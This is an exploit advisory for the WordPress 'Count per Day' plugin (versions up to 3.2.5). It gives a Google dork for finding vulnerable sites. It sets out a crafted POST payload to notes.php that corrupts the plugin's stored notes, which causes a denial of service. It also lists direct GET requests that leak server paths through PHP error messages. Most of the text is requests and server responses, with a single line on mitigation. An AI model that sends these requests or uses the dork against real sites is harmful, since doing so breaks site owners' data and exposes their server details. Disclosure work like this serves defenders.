# Exploit Title: WordPress Counter per Day plugin <= 3.2.3. Path Disclosure and Denial-Of-Service (DOS) # Date: 2013-03-04 # Google Dork:inurl:/wp-content/plugins/count-per-day # # Author: alejandr0.m0f0 # # versions: 3.2.3(tested) # # Impact: # -- path disclosure # -- DOS of the notes functionality of the count per day plugin --------------------- HTTP request: #1 -- POST /wp-content/plugins/count-per-day/notes.php month=3&year=2013&date='\xbf\'"('¬e=qwdqwd&new=%2B --------------------- HTTP response: Fatal error: [] operator not supported for strings in .../websites/wordpress/wp-content/plugins/count-per-day/notes.php on line 26 --------------------- --> PATH DISCLOSURE once the previous request is performed, admin is unable to save notes anymore, nor view the previously saved ones. --------------------- HTTP request: #2 -- GET /wp-content/plugins/count-per-day/notes.php --------------------- HTTP response: -- Notes Warning: Invalid argument supplied for foreach() in .../websites/wordpress/wp-content/plugins/count-per-day/notes.php on line 85 --------------------- --> DENIAL OF SERVICE, unability to enter or view notes anymore --> the structure of the wordpress stored object (wp_options WHERE option_name='count_per_day_notes') is corrupted. did not take time analyzing if this could leak to php code execution. this is unlikely to be achieved. --------------------- ------------------------------------------------------------ # Exploit Title: WordPress Counter per Day plugin <= 3.2.5. Path Disclosure # Date: 2013-03-04 # Google Dork:inurl:/wp-content/plugins/count-per-day # # Author: alejandr0.m0f0 # # versions: 3.2.5(tested) # # Impact: # -- path disclosure ---- GET /wp-content/plugins/count-per-day/ajax.php ---- Notice: Undefined index: f in ...wp-content/plugins/count-per-day/ajax.php on line 2 ---- GET /wp-content/plugins/count-per-day/counter-core.php ---- Notice: Undefined variable: cpd_path in ...wp-content/plugins/count-per-day/counter-core.php on line 10 Notice: Undefined variable: cpd_path in ...wp-content/plugins/count-per-day/counter-core.php on line 11 Notice: Undefined variable: cpd_path in ...wp-content/plugins/count-per-day/counter-core.php on line 12 ---- GET /wp-content/plugins/count-per-day/counter-options.php ---- Fatal error: Call to undefined function wp_create_nonce() in ...wp-content/plugins/count-per-day/counter-options.php on line 346 ---- GET /wp-content/plugins/count-per-day/counter.php ---- Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in ...wp-content/plugins/count-per-day/counter.php on line 15 Notice: Use of undefined constant PLUGINDIR - assumed 'PLUGINDIR' in ...wp-content/plugins/count-per-day/counter.php on line 15 Warning: include_once(ABSPATHPLUGINDIR/count-per-day/counter-core.php): failed to open stream: No such file or directory in ...wp-content/plugins/count-per-day/counter.php on line 16 Warning: include_once(): Failed opening 'ABSPATHPLUGINDIR/count-per-day/counter-core.php' for inclusion (include_path='.:') in ...wp-content/plugins/count-per-day/counter.php on line 16 Fatal error: Class 'CountPerDayCore' not found in ...wp-content/plugins/count-per-day/counter.php on line 22 --------- mitigation for path disclosure: PHP configuration, disable printing of any error for remote clients